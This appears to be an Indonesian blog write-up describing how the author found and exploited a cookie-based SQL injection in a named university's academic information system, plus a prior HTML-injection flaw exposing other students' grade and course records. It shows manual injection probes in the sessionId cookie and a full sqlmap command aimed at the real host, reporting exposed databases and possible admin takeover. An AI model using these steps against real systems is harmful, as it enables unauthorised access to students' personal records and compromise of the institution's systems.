Bug SQL-Injection ini saya dapati secara tidak sengaja, melanjutkan dari penemuan bug pertama yaitu Workflow System Manipulation.
Bug HTML-Injection yang ada pada website memungkinkan mahasiswa lain mendownload data mahasiswa lainnya tanpa harus login ke akun mereka.
Beberapa data yang bisa didownload seperti data KRS, KHS, dan Transkrip Nilai.
Berbeda dengan bug SQL-Injection ini, kalian bisa mengambil semua data yang ada dalam website dan ada kemungkinan untuk menjadi admin pada website SIA USM itu sendiri.
Sebagai catatan dari sepemahaman saya, bug ini hanya bisa di exploitasi jika kalian adalah mahasiswa/alumni Universitas Semarang yang notabene mempunyai akses masuk ke sistem informasi akademik.
Lalu bagaimana itu bisa terjadi? izinkan saya menjelaskannya ...
[#] Finding vurnerability with (Lightning Browser + SandroProxy)
• Mengakses situs web sia.usm.ac.id seperti biasa dengan browser Lightning
• Pantau proses yang terjadi saat mengakses situs sia.usm.ac.id dengan SandroProxy
• Dan terlihat ... dari jumlah css, gambar, dan javascript yang diproses ada file php yang berfungsi di dalamnya.
• Selanjutnya, coba lakukan "MANUAL REQUEST" pada cookie dan suntikkan secara manual.
Cookie : sessionId=xxxxxd1fdc' order by 1# (Not Error)Cookie : sessionId=xxxxxd1fdc' order by 2# (Error)
karena tidak ada "angka ajaib" yang keluar, saya mencoba beralih menggunakan tool SQLMap.
[#] Exploitation Target with (Termux + SQLMap)
Install SQLMAP pada Termux terlebih dahulu, dan mulai melakukan penetrasi pada website.
$ python2 sqlmap.py -u "https://sia.usm.ac.id/HIDDEN.php" --cookie="xxx=xxx;sessionId=xxxxad1fdc*" -p "sessionId" --dbs
Ada beberapa indikasi jika target mungkin untuk diinject.
Dan hasilnya terlihat banyak database yang terekspos di website sia.usm.ac.id
Oke mungkin itu saja dari saya, apabila ada penyampaian kata yang kurang tepat mohon masukannya hehe.
Sekian dan terimakasih
AchArt
Reference:
https://exploit.linuxsec.org/tutorial-sql-injection-manual/
https://computer-lords.blogspot.com/2017/11/cookie-based-sql-injection_8.html
https://github.com/sqlmapproject/sqlmap
https://play.google.com/store/apps/details?id=org.sandroproxy
https://play.google.com/store/apps/details?id=acr.browser.barebones
https://play.google.com/store/apps/details?id=com.termux